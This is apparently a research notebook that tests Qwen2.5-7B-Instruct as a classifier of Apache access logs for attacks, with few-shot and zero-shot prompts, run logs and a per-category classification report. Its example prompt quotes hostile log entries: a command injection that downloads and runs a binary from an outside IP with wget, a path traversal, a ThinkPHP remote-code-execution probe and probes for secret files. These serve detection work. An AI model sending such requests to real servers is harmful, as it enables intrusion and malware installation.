In [2]:
from vllm import LLM, SamplingParams
from transformers import AutoTokenizer, pipeline
import pandas as pd
from datasets import Dataset
from torch.utils.data import DataLoader
import multiprocessing as mp
import os
import re
import glob
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.metrics import classification_report, hamming_loss

INFO 04-09 17:10:14 [__init__.py:239] Automatically detected platform cuda.


In [3]:
dataset_path = glob.glob("../data/*.csv")
taxonomy_map = {
    "info": 1,
    "injection": 2,
    "traversal": 3,
    "rce": 4,
    "proxy": 5,
    "xss": 6,
    "llm": 7,
    "other": 8
}

In [4]:
def load_csv(dataset_path):
    df = pd.read_csv(dataset_path, skiprows=lambda x: x in range(1), names=['log', 'label', 'category', 'misc'])
    return df

In [5]:
df = pd.concat((load_csv(f) for f in dataset_path), ignore_index=True)
df = df.drop(df.columns[3], axis=1)
df["category"] = df["category"].apply(    
    lambda x: sorted([
        taxonomy_map[k.strip().lower()]
        for k in str(x).split(',')
        if k.strip().lower() in taxonomy_map
    ]) if pd.notna(x) else [0]
    )

In [6]:
count_ones = (df['label'] == 1).sum()
count_ones

2174

In [7]:
count_zeros = (df['label'] == 0).sum()
count_zeros

1188

In [8]:
mp.set_start_method('spawn', force=True)

In [8]:
os.environ['VLLM_WORKER_MULTIPROC_METHOD'] = 'spawn'
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
llm = LLM(model="Qwen/Qwen2.5-7B-Instruct")
sampling_params = SamplingParams(temperature=0.7, top_p=0.8, repetition_penalty=1.05, max_tokens=1024)
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-7B-Instruct")

INFO 04-08 22:49:27 [config.py:585] This model supports multiple tasks: {'embed', 'generate', 'classify', 'score', 'reward'}. Defaulting to 'generate'.
INFO 04-08 22:49:27 [config.py:1697] Chunked prefill is enabled with max_num_batched_tokens=8192.
INFO 04-08 22:50:38 [__init__.py:239] Automatically detected platform cuda.
INFO 04-08 22:50:53 [core.py:54] Initializing a V1 LLM engine (v0.8.2) with config: model='Qwen/Qwen2.5-7B-Instruct', speculative_config=None, tokenizer='Qwen/Qwen2.5-7B-Instruct', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, override_neuron_config=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=32768, download_dir=None, load_format=LoadFormat.AUTO, tensor_parallel_size=1, pipeline_parallel_size=1, disable_custom_all_reduce=False, quantization=None, enforce_eager=False, kv_cache_dtype=auto,  device_config=cuda, decoding_config=DecodingConfig(guided_decoding_backend='xgrammar', reasoning_backend=None), obser

Loading safetensors checkpoint shards:   0% Completed | 0/4 [00:00<?, ?it/s]
Loading safetensors checkpoint shards:  25% Completed | 1/4 [00:03<00:11,  3.87s/it]
Loading safetensors checkpoint shards:  50% Completed | 2/4 [00:07<00:07,  3.87s/it]
Loading safetensors checkpoint shards:  75% Completed | 3/4 [00:11<00:03,  3.78s/it]
Loading safetensors checkpoint shards: 100% Completed | 4/4 [00:15<00:00,  3.85s/it]
Loading safetensors checkpoint shards: 100% Completed | 4/4 [00:15<00:00,  3.84s/it]



INFO 04-08 22:51:17 [loader.py:447] Loading weights took 15.43 seconds
INFO 04-08 22:51:17 [gpu_model_runner.py:1186] Model loading took 14.2487 GB and 17.860982 seconds
INFO 04-08 22:51:48 [backends.py:415] Using cache directory: /rds/general/user/rm521/home/.cache/vllm/torch_compile_cache/916db28585/rank_0_0 for vLLM's torch.compile
INFO 04-08 22:51:48 [backends.py:425] Dynamo bytecode transform time: 30.76 s
INFO 04-08 22:51:49 [backends.py:115] Directly load the compiled graph for shape None from the cache
INFO 04-08 22:51:55 [monitor.py:33] torch.compile takes 30.76 s in total
INFO 04-08 22:51:57 [kv_cache_utils.py:566] GPU KV cache size: 370,512 tokens
INFO 04-08 22:51:57 [kv_cache_utils.py:569] Maximum concurrency for 32,768 tokens per request: 11.31x
INFO 04-08 22:52:13 [gpu_model_runner.py:1534] Graph capturing finished in 16 secs, took 0.49 GiB
INFO 04-08 22:52:14 [core.py:151] init engine (profile, create kv cache, warmup model) took 56.22 seconds


In [9]:
dataset = Dataset.from_pandas(df)

In [10]:
def generate_few_shot(log):
    messages = [
        {"role": "system", "content": "You are a cybersecurity expert analyzing Apache log entries to detect potential security threats."},
        {"role": "user", "content": "Given a log entry collected from Apache HTTP server, classify it as ""Malicious"" or ""Benign"". \n\
        If malicious, briefly explain why. If benign, just return the classification. Output must be in JSON format for structured parsing. \n\
        Format: \n\
        {{ \n""classification"": ""Malicious or Benign"",\n\
        ""reason"": ""Explanation if malicious, otherwise empty""\n\
        }}\n\
        Examples: \n\
        Log Entry 0: 84.252.135.0 - - [12/Mar/2025:03:22:48 +0000] ""HEAD /.env.~ HTTP/1.1"" 404 196 ""-"" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67""\n\
        Response:\n\
        {{\n\
          ""classification"": ""Malicious"",\n\
          ""reason"": ""Attempt to access .env.~ file, potentially to gather sensitive information such as credentials or configuration data.""\n\
        }}\n\
        Log Entry 1: 146.169.25.131 - - [30/Sep/2018:06:30:09 +0100] ""GET /~mwj/moin-static/csg/css/sIFR-screen.css HTTP/1.1"" 302 291 ""https://www.doc.ic.ac.uk/csg-res/dynamic/motd.cgi"" ""Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256\n\
        Response:\n\
        {{\n\
          ""classification"": ""Benign"",\n\
          ""reason"": "" ""\n\
        }}\n\
        Log Entry 2: 118.194.249.72 - - [25/Feb/2025:09:44:43 +0000] ""GET /config.json HTTP/1.1"" 404 438 ""-"" ""Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11""\n\
        Response:\n\
        {{\n\
          ""classification"": ""Malicious"",\n\
          ""reason"": ""The request attempts to access 'config.json', which is a common target for reconnaissance or sensitive data exposure attacks.""\n\
        }}\n\
        Log Entry 3: 185.40.4.51 - - [21/Mar/2025:06:58:23 +0000] ""POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20meowarm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Fmeowarm7%3B%20chmod%20777%20%2A%3B%20.%2Fmeowarm7%20tbk HTTP/1.1"" 400 483 ""-"" ""-""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request contains a command injection attempt, trying to execute shell commands to download and execute a potential malware ('meowarm7') from an external server (42.112.26.36).""\n\
        }}\n\
        Log Entry 4: 185.226.196.28 - - [21/Mar/2025:13:40:30 +0000] ""HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1"" 400 161 ""-"" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request attempts directory traversal ('/.%2e/%2e%2e/') to access restricted files, which is a common reconnaissance technique used by attackers to exploit vulnerabilities in web servers.""\n\
        }}\n\
        Log Entry 5: 142.93.117.195 - - [09/Mar/2025:21:43:36 +0000] ""POST /xmlrpc/pingback HTTP/1.1"" 404 457 ""-"" ""Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request targets '/xmlrpc/pingback', which is commonly exploited in WordPress XML-RPC Pingback attacks to perform DDoS amplification or reconnaissance.""\n\
        }}\n\
        Log Entry 6: 142.93.117.195 - - [09/Mar/2025:21:43:35 +0000] ""GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2N2NzA3NDE1cGRmZWU0YWRlNW5nNXUxaHh4M3RuazhuZi5vYXN0Lm1lLz9pZD1IRjklMjV7MTMzNyoxMzM3fSMueHgvLw== HTTP/1.1"" 404 457 ""-"" ""Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request targets 'LwaClient.aspx' with a suspicious Base64-encoded URL parameter, which suggests an attempt to exploit a web application vulnerability or conduct phishing or redirection attacks.""\n\
        }}\n\
        Log Entry 7: 58.210.197.13 - - [04/Mar/2025:11:41:02 +0000] ""GET /public/index.php?s=/index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1"" 404 493 ""-"" ""Custom-AsyncHttpClient""\n\
        Response:\n\
        {{\n\
            ""classification"": ""Malicious"",\n\
            ""reason"": ""The request targets a PHP vulnerability in the ThinkPHP framework, attempting a remote code execution (RCE) attack using the 'call_user_func_array' function and the 'md5' hashing function.""\n\
        }}\n\
        Based on the previous examples, classify the following log entry based on its content and behavior, rather than determining if the request was successful, disregarding the '404' status code. The log is :" + log},
    ]
    return messages


In [11]:
def generate_zero_shot(log):
    user_prompt = "Given a log entry collected from an Apache HTTP server, classify it as either \"Malicious\" or \"Benign\".\n\n\
    If the log is classified as malicious, specify the reason(s) (can be multiple) by selecting from the following categories: \n\n\
    1. information exposure (reconaissance, scanning)\n \
    2. injection (including command injection, sql injection, XML external entity attack, shellcode injection)\n \
    3. path traversal\n\
    4. remote code execution\n\
    5. proxy-based attack (Server-Side Request Forgery, open redirect)\n \
    6. cross site scripting\n\
    7. prompt injection targeting LLM models\n\
    8. other (not mentioned above, e.g., local file inclusion, remote file inclusion, etc.)\n\n\
    Return your answer in strict JSON format for structured parsing. Use the following format:\n\n{{\n  \"classification\": \"Malicious or Benign\",\n  \"reason\": \"Comma-separated list of category numbers if malicious; leave empty if benign\"\n}}\n #### Explaination: why the weblog provided is malicious, leave empty if benign.\n\
    After the JSON briefly explain the reasoning for malicious classifications, if the log is benign, no explanation is needed."
    messages = [
        {"role": "system", "content": "You are a cybersecurity expert analyzing Apache log entries to detect potential security threats."},
        {"role": "user", "content": user_prompt + 
        "Log:" + log},
    ]
    return messages

In [12]:
def classify_log(prompts):
    predictions = []
    text = tokenizer.apply_chat_template(
        prompts,
        tokenize=False,
        add_generation_prompt=True
    )
    outputs = llm.generate(text, sampling_params)
    for output in outputs:
        prompt = output.prompt
        generated_answer = output.outputs[0].text
        print(f"Prompt: {prompt!r},\n\nGenerated text: {generated_answer!r}\n")
        generated_answer = generated_answer.lower()
        matched = False
        for line in generated_answer.split("\n"):
            if "reason" in line:
                matched = True
                match = re.search(r'"reason":\s*"([^"]*)"', line)
                if match:
                    reason_str = match.group(1)
                    categories = [int(x.strip()) for x in reason_str.split(",") if x.strip()]
                    if not categories:
                        categories = [0]
                    predictions.append(categories)
                    break
                else:
                    predictions.append([0])
                    break
        if not matched:
            predictions.append([0])
    return predictions


In [13]:
dataloader = DataLoader(dataset['log'], batch_size=5, shuffle=False)
predictions = []
for batch in dataloader:
    prompts = []
    for log in batch:
        prompts.append(generate_zero_shot(log))
    predictions.extend(classify_log(prompts))

Processed prompts: 100%|██████████| 5/5 [00:02<00:00,  2.03it/s, est. speed input: 980.68 toks/s, output: 54.91 toks/s]


Prompt: '<|im_start|>system\nYou are a cybersecurity expert analyzing Apache log entries to detect potential security threats.<|im_end|>\n<|im_start|>user\nGiven a log entry collected from an Apache HTTP server, classify it as either "Malicious" or "Benign".\n\n    If the log is classified as malicious, specify the reason(s) (can be multiple) by selecting from the following categories: \n\n    1. information exposure (reconaissance, scanning)\n     2. injection (including command injection, sql injection, XML external entity attack, shellcode injection)\n     3. path traversal\n    4. remote code execution\n    5. proxy-based attack (Server-Side Request Forgery, open redirect)\n     6. cross site scripting\n    7. prompt injection targeting LLM models\n    8. other (not mentioned above, e.g., local file inclusion, remote file inclusion, etc.)\n\n    Return your answer in strict JSON format for structured parsing. Use the following format:\n\n{{\n  "classification": "Malicious or Benign

Processed prompts: 100%|██████████| 5/5 [00:03<00:00,  1.53it/s, est. speed input: 734.32 toks/s, output: 56.16 toks/s] 


Prompt: '<|im_start|>system\nYou are a cybersecurity expert analyzing Apache log entries to detect potential security threats.<|im_end|>\n<|im_start|>user\nGiven a log entry collected from an Apache HTTP server, classify it as either "Malicious" or "Benign".\n\n    If the log is classified as malicious, specify the reason(s) (can be multiple) by selecting from the following categories: \n\n    1. information exposure (reconaissance, scanning)\n     2. injection (including command injection, sql injection, XML external entity attack, shellcode injection)\n     3. path traversal\n    4. remote code execution\n    5. proxy-based attack (Server-Side Request Forgery, open redirect)\n     6. cross site scripting\n    7. prompt injection targeting LLM models\n    8. other (not mentioned above, e.g., local file inclusion, remote file inclusion, etc.)\n\n    Return your answer in strict JSON format for structured parsing. Use the following format:\n\n{{\n  "classification": "Malicious or Benign

Processed prompts: 100%|██████████| 5/5 [00:03<00:00,  1.26it/s, est. speed input: 718.78 toks/s, output: 97.23 toks/s]


...

Prompt: '<|im_start|>system\nYou are a cybersecurity expert analyzing Apache log entries to detect potential security threats.<|im_end|>\n<|im_start|>user\nGiven a log entry collected from an Apache HTTP server, classify it as either "Malicious" or "Benign".\n\n    If the log is classified as malicious, specify the reason(s) (can be multiple) by selecting from the following categories: \n\n    1. information exposure (reconaissance, scanning)\n     2. injection (including command injection, sql injection, XML external entity attack, shellcode injection)\n     3. path traversal\n    4. remote code execution\n    5. proxy-based attack (Server-Side Request Forgery, open redirect)\n     6. cross site scripting\n    7. prompt injection targeting LLM models\n    8. other (not mentioned above, e.g., local file inclusion, remote file inclusion, etc.)\n\n    Return your answer in strict JSON format for structured parsing. Use the following format:\n\n{{\n  "classification": "Malicious or Benign

Processed prompts: 100%|██████████| 5/5 [00:04<00:00,  1.13it/s, est. speed input: 504.54 toks/s, output: 129.58 toks/s]


Prompt: '<|im_start|>system\nYou are a cybersecurity expert analyzing Apache log entries to detect potential security threats.<|im_end|>\n<|im_start|>user\nGiven a log entry collected from an Apache HTTP server, classify it as either "Malicious" or "Benign".\n\n    If the log is classified as malicious, specify the reason(s) (can be multiple) by selecting from the following categories: \n\n    1. information exposure (reconaissance, scanning)\n     2. injection (including command injection, sql injection, XML external entity attack, shellcode injection)\n     3. path traversal\n    4. remote code execution\n    5. proxy-based attack (Server-Side Request Forgery, open redirect)\n     6. cross site scripting\n    7. prompt injection targeting LLM models\n    8. other (not mentioned above, e.g., local file inclusion, remote file inclusion, etc.)\n\n    Return your answer in strict JSON format for structured parsing. Use the following format:\n\n{{\n  "classification": "Malicious or Benign

Processed prompts: 100%|██████████| 2/2 [00:04<00:00,  2.19s/it, est. speed input: 193.78 toks/s, output: 58.80 toks/s]

Prompt: '<|im_start|>system\nYou are a cybersecurity expert analyzing Apache log entries to detect potential security threats.<|im_end|>\n<|im_start|>user\nGiven a log entry collected from an Apache HTTP server, classify it as either "Malicious" or "Benign".\n\n    If the log is classified as malicious, specify the reason(s) (can be multiple) by selecting from the following categories: \n\n    1. information exposure (reconaissance, scanning)\n     2. injection (including command injection, sql injection, XML external entity attack, shellcode injection)\n     3. path traversal\n    4. remote code execution\n    5. proxy-based attack (Server-Side Request Forgery, open redirect)\n     6. cross site scripting\n    7. prompt injection targeting LLM models\n    8. other (not mentioned above, e.g., local file inclusion, remote file inclusion, etc.)\n\n    Return your answer in strict JSON format for structured parsing. Use the following format:\n\n{{\n  "classification": "Malicious or Benign

In [14]:
print(len(predictions))

3422


In [15]:
df['prediction'] = predictions
print(f"Len: {len(predictions)}, len of df: {len(df)}")
print(df)

Len: 3422, len of df: 3422
                                                    log  label   category  \
0     146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [3, 7]   
1     146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [3, 7]   
2     146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [6, 7]   
3     146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0  [3, 4, 7]   
4     146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [4, 7]   
...                                                 ...    ...        ...   
3417  180.191.159.142 - - [30/Sep/2018:09:25:52 +010...    0.0        [0]   
3418  107.178.194.113 - - [30/Sep/2018:09:32:38 +010...    0.0        [0]   
3419  107.178.194.111 - - [30/Sep/2018:09:32:39 +010...    0.0        [0]   
3420  82.33.124.202 - - [30/Sep/2018:10:33:58 +0100]...    0.0        [0]   
3421  207.46.13.148 - - [30/Sep/2018:10:45:50 +0100]...    0.0        [0]   

     prediction  
0           [0]  
1           

In [16]:
df[df['category'].apply(lambda x: 2 in x)]

log  label   category  \
5     146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [2, 7]   
9     146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [2, 7]   
13    146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [2, 7]   
28    146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0  [2, 3, 7]   
30    146.179.87.34 - - [03/Apr/2025:18:29:39 +0000]...    1.0     [2, 7]   
...                                                 ...    ...        ...   
3072  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...    1.0        [2]   
3076  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...    1.0        [2]   
3089  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...    1.0        [2]   
3090  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...    1.0     [2, 4]   
3102  146.179.87.42 - - [01/Apr/2025:23:22:56 +0000]...    1.0        [2]   

     prediction  
5           [0]  
9           [0]  
13          [0]  
28          [0]  
30          [2]  
...         ...  
3072     [2, 4]  
3076     [1, 2]  
3089        [2]  
3090     [2, 4]  
3102        [2]  

[80 rows x 4 columns]

In [17]:
mlb = MultiLabelBinarizer()
y_true = mlb.fit_transform(df['category'])
y_pred = mlb.transform(df['prediction'])

In [18]:
class_labels = [str(label) for label in mlb.classes_]
print(class_labels)
print("Classification Report:\n", classification_report(y_true, y_pred, target_names=class_labels))
hamming = hamming_loss(y_true, y_pred)
print(f"Hamming Loss: {hamming}")

['0', '1', '2', '3', '4', '5', '6', '7', '8']
Classification Report:
               precision    recall  f1-score   support

           0       0.49      0.91      0.64      1248
           1       0.78      0.33      0.47      1699
           2       0.17      0.79      0.28        80
           3       0.70      0.75      0.72       175
           4       0.33      0.38      0.35       176
           5       0.83      0.38      0.52        79
           6       0.93      0.73      0.81       121
           7       0.03      0.03      0.03        61
           8       0.00      0.00      0.00        15

   micro avg       0.52      0.57      0.54      3654
   macro avg       0.47      0.48      0.42      3654
weighted avg       0.63      0.57      0.53      3654
 samples avg       0.53      0.58      0.55      3654

Hamming Loss: 0.1144554841223456
